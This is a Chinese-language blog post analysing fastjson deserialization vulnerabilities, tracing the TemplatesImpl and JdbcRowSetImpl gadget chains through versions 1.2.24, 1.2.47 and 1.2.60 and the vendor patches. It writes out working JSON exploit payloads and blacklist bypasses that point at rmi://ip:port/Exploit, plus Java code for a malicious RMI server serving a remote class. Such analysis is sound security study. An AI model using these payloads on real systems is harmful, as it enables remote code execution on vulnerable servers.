美文网首页Web安全
fastjson漏洞学习分析

fastjson漏洞学习分析

作者: gelinlang | 来源:发表于2020-02-19 16:11 被阅读0次

    0x00前言

    前面写了fastjson的利用,现在补上fastjson的分析。

    0x01fastjson基本使用

    toJSONString()
    parseObject()
    这两个函数一个将对象转化为json字符串,一个将json字符串反序列化成对象。


    image.png

    一般来说使用第一种方法输出json字符串,这里将第二种方法写出来,是想体现fastjson可以识别json中的一些特殊的属性,比如说如果json字符串中某个key是“@type”,它就认为该key对应的value用于指定该json字符串对应的对象类型。


    image.png
    可以看到带指定对象类型的参数都反序列化成功了,也就是说反序列化必须指定对象类型,但是实际开发中大多数时候是并不知道对象类型的,所以通常会将对象类型设置为Object.class,毕竟java中所有类都是Object的子类。然后通过@type的值确定对象类型。反序序列化的入口也是这个函数parseObject()。
    image.png

    我们可以看到,反序列化后的对象属性是有值的,说明它会自动调用对象的getter和setter方法。fastjson的反序列化漏洞就出现在这里,当json字符串可控时(就是我们经常抓包会在请求中看到一些json字符串,通过修改这些字符串),我们可以反序列化出任意对象,只需要找到某个对象的构造函数或属性的getter、setter方法中有危险操作,那么我们就可以通过构造json进行反序列化执行危险函数。

    0x02TemplatesImpl利用链

    这条链简单介绍一下,因为利用条件较苛刻。payload如下,bytecode属性装着是恶意class的base6
    4编码。


    image.png

    通常情况fastjson只会反序列化公开的属性,而上面payload中,bytecode属性是一个私有属性,想反序列化私有属性必须设置Feature.SupportNonPublicField这个参数。
    接下来看个例子。


    image.png
    可以看到普通的parseObject(),反序列化后私有属性是null的。在添加了Feature.SupportNonPublicField这个参数后才成功反序列化。也就是TemplatesImpl利用链必须开发在json反序列化添加Feature.SupportNonPublicField这个参数后才能成功。所以这里重点分析JdbcRowSetImpl利用链

    0x03JdbcRowSetImpl利用链

    在分析这条利用链前,首先要知道RMI、JDNI这两个概念。
    RMI(remote method invocation)叫远程方法调用,Java环境设计的远程方法调用机制,远程服务器实现具体的Java方法并提供接口,客户端本地仅需根据接口类的定义,提供相应的参数即可调用远程方法。


    image.png

    大概意思就是,首先开启一个RMI服务,然后客户端需要调用某个方法就到这里去查询,返回给客户端一个对象的引用,通过这个对象的引用去调用具体方法。
    JNDI(Java Naming and Directory Interface)就是java命名和目录接口。JNDI提供统一的客户端API,通过不同的访问提供者接口JNDI服务供应接口(SPI)的实现。


    image.png
    jndi大概就是一组api接口。每一个对象都有唯一的键值绑定,将名字和对象绑定,可以通过名字检索对象,对象就存储在rmi,ldap等服务。可以通过Search(),Lookup()之类的函数去查找远程对象。
    客户端在用lookup()查找这个远程对象时,客户端会获取相应的object factory,最终通过factory类将reference转换为具体的对象实例。Reference是java中的引用类。

    0x04环境准备

    payload如下

    {
            "@type":"com.sun.rowset.JdbcRowSetImpl",
            "dataSourceName":"rmi://ip:port/Exploit",
            "autoCommit":true
    }
    

    先启动RMI服务

    import com.sun.jndi.rmi.registry.ReferenceWrapper;
    import javax.naming.NamingException;
    import javax.naming.Reference;
    import java.rmi.AlreadyBoundException;
    import java.rmi.RemoteException;
    import java.rmi.registry.LocateRegistry;
    import java.rmi.registry.Registry;
    public class server {
        public static void start() throws
                AlreadyBoundException, RemoteException, NamingException {
            Registry registry = LocateRegistry.createRegistry(9999);
            String remote_class_server = "http://ip:port/";//恶意类远程地址
            Reference reference = new Reference("Exploit", "Exploit", remote_class_server);//第一个参数为恶意类名,第二个为factory。
            //reference的factory class参数指向了一个外部Web服务的地址
            ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
            registry.bind("Exploit", referenceWrapper);
    
            System.out.println("Listener on 9999");
        }
        public static void main(String[] args) throws AlreadyBoundException, RemoteException, NamingException{
            start();
        }
    }
    

    编译一个恶意类


    image.png

    把他放到web服务器上,在RMI服务绑定好。


    image.png

    0x05开始调试1.2.24版本

    入口函数parseObject()下断点开始调试。


    image.png

    跟到这,判断key是否是@type,如果是,便加载对应的class


    image.png
    继续跟,这里开始反序列化阶段。
    image.png

    具体操作就是通过反射调用 setter 方法赋值


    image.png
    我们的payload中有一个属性autoCommit为true。会调用下图方法
    image.png
    跟进
    image.png
    调用lookup()方法。
    image.png
    然后会去寻找我们写好的恶意rmi服务类。通过lookup方法就实例化了这个恶意类,从而导致构造方法的恶意代码触发。
    image.png

    完整利用链


    image.png
    结束

    0x06官方补丁

    image.png

    可以看到把loadclass一行删除,新添了一个检查函数checkAutoType(),并且把com.sun设置为黑名单。

    0x07补丁绕过

    {"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"rmi://ip:port/Exploit"}}
    {"@type":"Lcom.sun.rowset.RowSetImpl;","dataSourceName":"rmi://ip:port/Exploit","autoCommit":true}
    

    第一个payload就是找到了一个类不在黑名单里,第二个payload分析在原来的类,开头添加了L,尾添加了;,分析如下


    image.png

    添加了这两个字符后的类肯定不在黑名单里,然后跟到loadclass函数里,可以看到当以L开头;结尾是,会将这两个字符移除,又变成了com.sun.rowset.RowSetImpl。

    0x08开始分析1.2.47版本

    payload

    {
       "a":{
            "@type":"java.lang.Class",
            "val":"com.sun.rowset.JdbcRowSetImpl"
        },
        "b":{
            "@type":"com.sun.rowset.JdbcRowSetImpl",
            "dataSourceName":"rmi://ip:9999/Test",
            "autoCommit":true
        }
    }
    

    比之前版本多发送了一个java.lang.Class数据,开始调试看一下是怎么绕过的。


    image.png

    仍然跟到这,由于java.lang.Class不在黑名单里,checkAutoType不会拦截,然后跟到loadclass。


    image.png
    可以看到这里,因为我们传了一个属性"val":"com.sun.rowset.JdbcRowSetImpl",他去把这个作为对象加载了,虽然这个类被加载了,但是并没有传递到rmi属性和autoCommit属性,暂时并不会造成。成恶意影响。继续跟进
    image.png

    可以看到loadclass返回值里有一个cache属性为true。跟进


    image.png
    可以看到loadclass函数中,当cache为true是,会将JdbcRowSetImpl类加载到map缓存中。
    第一个json数据处理完了,接下来看一下第二个json数据。
    image.png
    仍然跟到这,然后跟进checkAutoType()函数,看一下这个在黑名单中的类为什么没有被拦截。
    image.png
    可以看到当class为空时,会从mapping中去找。在第一个json数据处理后,JdbcRowSetImpl类已经被加载到map缓存,然后直接就返回class了,绕过了后面的检测。
    在checkAutoType函数中,有一个配置就是autotype,默认这个是关闭的,接下来看一下当这个参数为true时的绕过。
    image.png

    首先在反序列化前新增一行代码设置为true。
    跟进到checkAutoType函数,进入如下循环


    image.png
    先验证了白名单,如果匹配变返回class,这里不在白名单里。然后匹配黑名单,由于getClassMapping这个条件不为null所以即使匹配到黑名单,但是仍然不会爆异常。

    0x09官方修复

    把cache的默认值改成了false,不让Class生成的对象存在mapping里。
    并且把java.lang.Class这个类加入了黑名单。

    0x09 1.2.60版本payload

    {"@type":"org.apache.commons.configuration.JNDIConfiguration","prefix":"rmi://ip:port/Exploit"}
    "{"@type":"oracle.jdbc.connector.OracleManagedConnectionFactory","xaDataSourceName":"rmi://ip:port/Exploit"}"
    

    仍然利用的是rmi服务,找到了不在黑名单中了类,但是有2个利用条件。依赖的特定的jar(commons-configuration, ojdbc14-10.2.0.2),并不是中间件或者JDK自带的jar;需要手动开启AutoType。

    0x10 总结

    1、fastjson 通过@type的值传入类,在解析json时,就会调用传入属性的getter,setter方法。如果找到一个类getter,setter能够传入可控的恶意class字节码或者是jdni服务,就能导致rce。
    2、fastjson的防范类是checkAutoType函数,而导致命令执行的很关键的一步是loadClass,因此从checkAutoType到loadClass之间的代码,是需要关注的关键部分。
    3、对于官方已经修复但是还没有公开的漏洞,github的源码中的更改记录可能有利用思路。

    相关文章

      网友评论

        本文标题:fastjson漏洞学习分析

        本文链接:https://www.haomeiwen.com/subject/ivdafhtx.html